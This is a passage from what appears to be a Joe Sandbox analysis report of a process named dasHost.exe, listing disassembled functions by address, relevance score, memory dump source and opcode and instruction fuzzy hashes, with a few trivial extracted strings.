Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bd73d3b6a9bc3acd5002917ea4249b5d4349937ef251a7eb07e87401d91325f
Instruction ID: e692df087ac7986e8abbb55951b6cb81139b728a79a86ae577bf2444d830ac92
Opcode Fuzzy Hash: 5bd73d3b6a9bc3acd5002917ea4249b5d4349937ef251a7eb07e87401d91325f
Instruction Fuzzy Hash: 43110471C0DA898FEB99EB64A8692B8BBA0FF66340F1500FEC00DC35D3DB295440C715

Function 00007FF848F4C560 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f4a000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7962732f10604656ab17200e05198fd740ac3df1f5556594bc2a797deffeb74d
Instruction ID: ba0a9c011fe306913fedc754c585013d07a06a2b133afa3fbf6628a902015a30
Opcode Fuzzy Hash: 7962732f10604656ab17200e05198fd740ac3df1f5556594bc2a797deffeb74d
Instruction Fuzzy Hash: 3F11883180DA8D8EEB86EB6888182BD7BA0FF29700F0406BBE409D71E2EB346540C754

Function 00007FF848F569C5 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fdacece3b97d9b485e89e7e4d63168ae4165fb1a79318db189461065493e7a0
Instruction ID: 62246f3c5293a1775b4d8c377403e7c3dc509221968bb614cb242b942771cfac
Opcode Fuzzy Hash: 6fdacece3b97d9b485e89e7e4d63168ae4165fb1a79318db189461065493e7a0
Instruction Fuzzy Hash: 3511C131D0DA898FEB99EF64886A2B9BBA0FF55380F0440BEC41DC65D3DF295444C745

Function 00007FF848F54AA9 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b42015dc0774880680e3f886e34808b824589fb8aad4e1205d6e7fe40bade484
Instruction ID: f2193d2b1ea0703a8cf369d079e9b1f6129e176d19a576fc1fa7c862da6a92fb
Opcode Fuzzy Hash: b42015dc0774880680e3f886e34808b824589fb8aad4e1205d6e7fe40bade484
Instruction Fuzzy Hash: 7111BE7090D68E9FEB85EF2488592B9BBB0FF29300F0404BAC409C61D3DB3964448755

Function 00007FF848F4BC41 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f4a000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45fc2caea7c42f8fdc6ebeb8ac9797a32341f5928272b0334b267a4f2c616685
Instruction ID: 44c3ac8e521778a266d018c46060c61aad8449669aef90395e043f4be303feb0
Opcode Fuzzy Hash: 45fc2caea7c42f8fdc6ebeb8ac9797a32341f5928272b0334b267a4f2c616685
Instruction Fuzzy Hash: BA116D70918A4D8FEB98EF64C8992BD7BE0FF28741F5109BBD40AD2192DF35A550C704

Function 00007FF848F57021 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3b9eb641b0c8c5e2a9cb08426b9fa73c3c0099344f0c469ba319353b02d5beb
Instruction ID: adcfee6c80e3b36ea4fd83752aa04c6639c2d5a2814e4980e1bf9b00c6d41d3d
Opcode Fuzzy Hash: c3b9eb641b0c8c5e2a9cb08426b9fa73c3c0099344f0c469ba319353b02d5beb
Instruction Fuzzy Hash: F911A13080DA4E8FE751FB74C8486AABBF4FF19341F0408B6D409C7492EB38A180C754

Function 00007FF848F56A5D Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9689506f88833c4791d5df964ad1152865323ac33fa28b9699d188eb48e5a63c
Instruction ID: 7b749da35d857000fd0796ae3e6b35965df931b37db58f20513955686cd989e2
Opcode Fuzzy Hash: 9689506f88833c4791d5df964ad1152865323ac33fa28b9699d188eb48e5a63c
Instruction Fuzzy Hash: FB11C13090D68E8FEB58EF24846A2BABBA0FF59380F1441BAD419C21C2DF3965448741

Function 00007FF848F52441 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de9fdbe0f946f6c868ff5a52317ce45bb192e4e5c49cc742c64db86038b2a4f0
Instruction ID: ee17ab546c2ab189e91ff6a2ce5349acd5bfb92b3b22af545effd40e4f6ce760
Opcode Fuzzy Hash: de9fdbe0f946f6c868ff5a52317ce45bb192e4e5c49cc742c64db86038b2a4f0
Instruction Fuzzy Hash: 8D116D3091D58E9FEB92FBA8C84C5F9BBE4FF5A341F0505B6D408C6093EB34A1948745

Function 00007FF848F5485D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71660b8ed86e9ce1691c1d299c169f77f174dd3bc0629726a5e039b3a07d1be0
Instruction ID: e1c9a1fb2473fb32e66267d22dbc1c0c853ba5cce53abe63c5697efe89de4948
Opcode Fuzzy Hash: 71660b8ed86e9ce1691c1d299c169f77f174dd3bc0629726a5e039b3a07d1be0
Instruction Fuzzy Hash: 80118C7080DA8A8FEB89EB6488592BDBBB0FF29342F1405BED419D61D3DF39A444C751

Function 00007FF848F55B49 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c62dbf909e84e1993953cafacd7152bbdbf13d30b7f8a8f8e5be61c5c832c020
Instruction ID: e7edfcaf7b6af23080168a0702cd2b8f40f709fb133f7f429bc0256da7baf78d
Opcode Fuzzy Hash: c62dbf909e84e1993953cafacd7152bbdbf13d30b7f8a8f8e5be61c5c832c020
Instruction Fuzzy Hash: 1D118C30C0E68AAFE782EB64885D2B9BBF0FF1A341F0405B6D408C70A3EB28A4448701

Function 00007FF848F4B865 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f4a000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0c3faf5e6f3f3302b972fafe9acbfe8b91237ee80b11562b9469f2d313f1821
Instruction ID: 79755253fa86bb440bc60b68ff8d93416c8b0b7ba903be43570a10381be7bd61
Opcode Fuzzy Hash: a0c3faf5e6f3f3302b972fafe9acbfe8b91237ee80b11562b9469f2d313f1821
Instruction Fuzzy Hash: 7A118B7091DA4E8FEB99EF64885C2B9BBE0FF28341F1104BFD409D2192DB34A540C704

Function 00007FF848F54A1D Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 524129b16d20494adc054718b4b1ee57c9c31623b11a75311a12b009db426848
Instruction ID: fb22e9266a71f0b299ea5cf6434750d71e0964af299542635f2c320a0c167800
Opcode Fuzzy Hash: 524129b16d20494adc054718b4b1ee57c9c31623b11a75311a12b009db426848
Instruction Fuzzy Hash: 28118F7090D99A9FEB85EF2484692B9BBA0FF28341F0404BAD409C61D2DF28A544C709

Function 00007FF848F56F11 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ab205e8c8bf0578aada16f94324a8493d6cadc721dc2572e74bb78bcdb48cbf
Instruction ID: ba58591fc38c79858e9578c2ca9317df87e1089206d70cf28d5d82a906f55ec1
Opcode Fuzzy Hash: 6ab205e8c8bf0578aada16f94324a8493d6cadc721dc2572e74bb78bcdb48cbf
Instruction Fuzzy Hash: 04014C70D1D64E9FEB51FB6888496ADBBF0FF29381F4449B6D428C71A2FB38A5448740

Function 00007FF848F42EB1 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6037a45caa2cae602ed29b2d7a16ecad57f2edb1c10cd7e18a4ba4067c646cf5
Instruction ID: 8dad628cf3e9df45dab5d50dd587eb80f1da6a76bd2e6dc2136b320e757c6c07
Opcode Fuzzy Hash: 6037a45caa2cae602ed29b2d7a16ecad57f2edb1c10cd7e18a4ba4067c646cf5
Instruction Fuzzy Hash: F601783091D64A9FE741FB68884D2A9BBE0EF69340F4508B7D408D70E6EB38A5808715

Function 00007FF848F405D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f18dac36baf91b0ac69d0124f5a4d2aba32a6bb10cf163d85a09c4b4a106c242
Instruction ID: 24dd9eb7fe4f991f8907657930d51792cce78c7b91112be695505963208000af
Opcode Fuzzy Hash: f18dac36baf91b0ac69d0124f5a4d2aba32a6bb10cf163d85a09c4b4a106c242
Instruction Fuzzy Hash: 0C014C30908A1E8EEB48FF64C4596BA77A1FF68385F50447AD40EE21D1DB35A590CB48

Function 00007FF848F57799 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bfcd22bdeb7ec8a7beb5e31c79ebc6f32a61885145c6589cc37fa23a01b7803
Instruction ID: 554d31c2faeae363949c3b8df8580596cd306127b8ed08566a93b0373c3f0a64
Opcode Fuzzy Hash: 3bfcd22bdeb7ec8a7beb5e31c79ebc6f32a61885145c6589cc37fa23a01b7803
Instruction Fuzzy Hash: E801D23080EA898FEB49AB34A4655BDBFA0FF19740F0504FAD40AC64D3DF29A504C705

Function 00007FF848F51E75 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af70d37636514e4e6d49eaf7d6007cef6a702d2755d82633507fa415fafebb8f
Instruction ID: fdc3641254fc822915a3beb434c600cab2c2fc9514cbf3a15ea2cab27049c660
Opcode Fuzzy Hash: af70d37636514e4e6d49eaf7d6007cef6a702d2755d82633507fa415fafebb8f
Instruction Fuzzy Hash: C601B13080D6899FDB59EB2488596F9BBA0FF19344F0504BED40AC60D3DB35B690C740

Function 00007FF848F4288D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73a0e9f7f77872e1c46325fa11a0496d3575e5d667fcac3ca36fef933879c5b2
Instruction ID: 8409b4fb7d1e8410f0602ab06ec42d47c9f900678a82524d419b05fe6b5d99c9
Opcode Fuzzy Hash: 73a0e9f7f77872e1c46325fa11a0496d3575e5d667fcac3ca36fef933879c5b2
Instruction Fuzzy Hash: 48017C3091D64D8FE751FB6888885A97BE0FF69741F1544B7D408D60A2EB38E484C704

Function 00007FF848F571A9 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c96e833755999acd5948671c6f42dc240149154f751f466610af98a2e5d45e51
Instruction ID: ad39ee69342eb23506578fc6baf21be551479caec79eb91de7e381406afa53b4
Opcode Fuzzy Hash: c96e833755999acd5948671c6f42dc240149154f751f466610af98a2e5d45e51
Instruction Fuzzy Hash: 9B018F3091DA8A5FE752BB3484495A9BBE0EF19341F4549B2D40CC70D3EF38A4448729

Function 00007FF848F4A659 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f4a000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 264f3ac7a7fd9ca37041fbf61427a705950b20332e5cd4974a78e493de18e226
Instruction ID: 68716356ba9c23f39f34495d90e65e3e1cfc05ad0684a7da5333e7f480a31ff3
Opcode Fuzzy Hash: 264f3ac7a7fd9ca37041fbf61427a705950b20332e5cd4974a78e493de18e226
Instruction Fuzzy Hash: F801A23094E6895FE752BB7488585A97BE4EF6A300F1604F3D408C70E2EF34E484C711

Function 00007FF848F5780D Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 597e9d448f1aca8ba3375ff226435f490e469f8629ffce7f1516549986f722fe
Instruction ID: c7ff7097b3ad98f36ca29e6ec65e4878f184efd9aad127d1908b41e937575cf1
Opcode Fuzzy Hash: 597e9d448f1aca8ba3375ff226435f490e469f8629ffce7f1516549986f722fe
Instruction Fuzzy Hash: 6801DF3080EA899FDB49EB24C4592BEBBA1FF19345F2404BED00AC65D3EF35A450C748

Function 00007FF848F41C8D Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2cae2f1b8e9da0ee2ee6d59fa080df7417d65ab05de0a5547a831ed60d195c0
Instruction ID: 81401c607cc86450fda31689e1f3155755f6a1ddfc968be10fde4ac2c9258123
Opcode Fuzzy Hash: c2cae2f1b8e9da0ee2ee6d59fa080df7417d65ab05de0a5547a831ed60d195c0
Instruction Fuzzy Hash: 5201A43084D69D8FEB98EF2488592FA7BE1FF65741F54007AE808D61D1EB35D890C744

Function 00007FF848F42F29 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 554fb228170d67a62c3133b761eed5d81e055c6c290288228ce3aac45035cebe
Instruction ID: 8e354530a590b6156ea2735371eacc088628da0341b9fe999871a7cd606eed6a
Opcode Fuzzy Hash: 554fb228170d67a62c3133b761eed5d81e055c6c290288228ce3aac45035cebe
Instruction Fuzzy Hash: 5F01DF30A0D68A4FE742FB7488591A97BE0EF29350F8504F3C408DB0E6EB38A444C700

Function 00007FF848F40608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8111814c965e774af80231f3d9ff7ca545ee55821102a48845b2614905796d5
Instruction ID: ffea3cf634a5f5716ff5e90f51e4927a3f74be030ade7218fdf074b5e2f711a7
Opcode Fuzzy Hash: b8111814c965e774af80231f3d9ff7ca545ee55821102a48845b2614905796d5
Instruction Fuzzy Hash: 8A016D3081850D9EEB48FB6484582B976A1FF28345F20087ED40ED21D1EF39A190C614

Function 00007FF848F40610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 688e02f5fd7185ffe7ec18ae3bdf6f29dfaab8168843889f600c879bfe966f50
Instruction ID: 824d94f6f2ece7f2f04b40b714f43ad16ba240234ed3c5a72c480675c6ef63c3
Opcode Fuzzy Hash: 688e02f5fd7185ffe7ec18ae3bdf6f29dfaab8168843889f600c879bfe966f50
Instruction Fuzzy Hash: 66016930918A0E9EEB48FBA484582BDB6A0FF28345F60087FE40ED21D1DF3AA590C604

Function 00007FF848F4A6C5 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f4a000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 471bad3fac80984a84749587816365b6f25f58caa991cf4a7201090b74d3e9e8
Instruction ID: 172aed33a56abc8ffee2734f465ef2bd83e72a7437881f00f018e4fb54b0fd68
Opcode Fuzzy Hash: 471bad3fac80984a84749587816365b6f25f58caa991cf4a7201090b74d3e9e8
Instruction Fuzzy Hash: A8F0623591F3865FE352AB6498A51E97BB4DF92654F0A05F7C088C60D3EB2C94848715

Function 00007FF848F405D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd394b090f27b1734bff0922b51c1caee605d62d10a32599e10378edb406bd76
Instruction ID: e4aa588346f6cc1c50f9c223c2885deb83912358d445754610712d423e4896d6
Opcode Fuzzy Hash: cd394b090f27b1734bff0922b51c1caee605d62d10a32599e10378edb406bd76
Instruction Fuzzy Hash: 92F0C23080D65E8FEB44FF2498052FA77A0FF25344F50003AE80DD21C1DB39A4A0C748

Function 00007FF848F427A9 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8da1bbc57b61cbd273b4ee6a6ff9d195021696aa679b6de29aa76870531fe146
Instruction ID: 0b9303170109b850b56d9f04b0a1a014c5bf75b177462017df1e42a4d5326888
Opcode Fuzzy Hash: 8da1bbc57b61cbd273b4ee6a6ff9d195021696aa679b6de29aa76870531fe146
Instruction Fuzzy Hash: ACF0A93080E78D8FEB5AAB6088282A93FA1EF26601F1504BBE408C60D2EB389458C301

Function 00007FF848F4281D Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3907b2984b971f456c5aaa8a7c9ca6693fecb7b7330da33edbb858f1f4b5db66
Instruction ID: 0c0d56034ab01f4902ef1dec189cdb8a9bda5f70ffb8bc0befb017ba97aaace6
Opcode Fuzzy Hash: 3907b2984b971f456c5aaa8a7c9ca6693fecb7b7330da33edbb858f1f4b5db66
Instruction Fuzzy Hash: 2FF09A3180D78A8FEB59AF6488592BD3BA0FF65741F5005BFE809C61D2EF39A451C640

Function 00007FF848F4B49F Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f4a000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02ade43b7233dfa056b2e9bcce53da560b54a7e0f6f49ada4b327beeaa8fd3fc
Instruction ID: b3a338c36fc5f7afac4ce3484e59fcfaeb28487d83ebc07fa45cf87d7d27bc3f
Opcode Fuzzy Hash: 02ade43b7233dfa056b2e9bcce53da560b54a7e0f6f49ada4b327beeaa8fd3fc
Instruction Fuzzy Hash: 1EF0F970D188198EEF99EB18C845BE9B3B1FF68740F1046A6D40DE3186CF74AAC18F44

Function 00007FF848F4F64E Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f4f000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c614611170a1fe60a2659d21d9cc097d6aec094e53fe35bc63487369e09d03
Instruction ID: cfe184ec4c728bdbf5cf10bda3a05f688eb99eb7e775bb71ca3800561dd86c73
Opcode Fuzzy Hash: c8c614611170a1fe60a2659d21d9cc097d6aec094e53fe35bc63487369e09d03
Instruction Fuzzy Hash: C7F0C9B0E4852D8FDBA8EF18D8587E9B7B1FB64351F5001EA914DE3291CB341AC18F15

Function 00007FF848F52812 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af9d6e9dc3ae94dc9821eb57cf3e263f34ed4271c3cd14bb92aa1cb14700403c
Instruction ID: 8eed01772a0c6edb12dae0c62c39284992ad04364aabe20e43188b352f023597
Opcode Fuzzy Hash: af9d6e9dc3ae94dc9821eb57cf3e263f34ed4271c3cd14bb92aa1cb14700403c
Instruction Fuzzy Hash: 38F0B230D0850A9FEB44EBA8C455AACB7A1EB68740F10822AC009E72D2DF386544CF48

Function 00007FF848F4FB05 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f4f000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afc89ea2a0ccbce0faf37776eff52598a234e1320af75d2c20129d245a7e2f53
Instruction ID: 63348ac2055f82ebd58d8ead6089efc2d101952cbd77ce0c8c550862aad2e51f
Opcode Fuzzy Hash: afc89ea2a0ccbce0faf37776eff52598a234e1320af75d2c20129d245a7e2f53
Instruction Fuzzy Hash: B9F0A570D091299EEBA4EF14C9807EA76B0AF65740F1000EA944CA2281CB345AC08F06

Function 00007FF848F45CE1 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b0d116d8f21b7c488de3e0c2f2efd555bf3d0d2861b7c35ba48b7ef54464ce9
Instruction ID: 27c7f56dee259aa19155270e09139f9101b18b5b1bfc1d27135960fd83428719
Opcode Fuzzy Hash: 3b0d116d8f21b7c488de3e0c2f2efd555bf3d0d2861b7c35ba48b7ef54464ce9
Instruction Fuzzy Hash: EBE026B4D1995D8FDBA4EB1488507A877B1AB68745F5000EA860DE3291DF3469809F19

Non-executed Functions

Function 00007FF848F5100C Relevance: 5.1, Strings: 4, Instructions: 73COMMON

Download Yara Rule

Strings

}, xrefs: 00007FF848F515FF
#, xrefs: 00007FF848F51632
(, xrefs: 00007FF848F5100C
-, xrefs: 00007FF848F5104B

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID: #$($-$}
API String ID: 0-3459047015
Opcode ID: 971be35041cfc1f7657a48c58474be107383d6d5d57ce9e788a4ba2c749f91fe
Instruction ID: c4587e554c65163ee7e918ec149fc528f2e11f3084b95e077d046a7b01ffd90a
Opcode Fuzzy Hash: 971be35041cfc1f7657a48c58474be107383d6d5d57ce9e788a4ba2c749f91fe
Instruction Fuzzy Hash: 4131C474D083298FDB68EF50C8947EDB6B1AF94745F10017EE44A6B2D2CB386984CF05

Analysis Process: dasHost.exePID: 1436, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F30A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

0vH, xrefs: 00007FF848F30A70

Memory Dump Source

Source File: 00000014.00000002.2218337382.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f30000_dasHost.jbxd

Similarity

API ID:
String ID: 0vH
API String ID: 0-2857910901
Opcode ID: 2215cffcf2fea49e502954bc1d0156e4b6d7916638f5979b6f222feb7e9686bc
Instruction ID: a36326d7b87b96bf078a7e6f9b317e1d7de8c01a8bfb7a914f08dea904c20e02
Opcode Fuzzy Hash: 2215cffcf2fea49e502954bc1d0156e4b6d7916638f5979b6f222feb7e9686bc
Instruction Fuzzy Hash: 6E115831D1954E9FEB80FB68D8492BA7BA1FF98380F4005B7D809C6192EF38A5448740

Function 00007FF848F3124D Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

hyH, xrefs: 00007FF848F312BD

Memory Dump Source

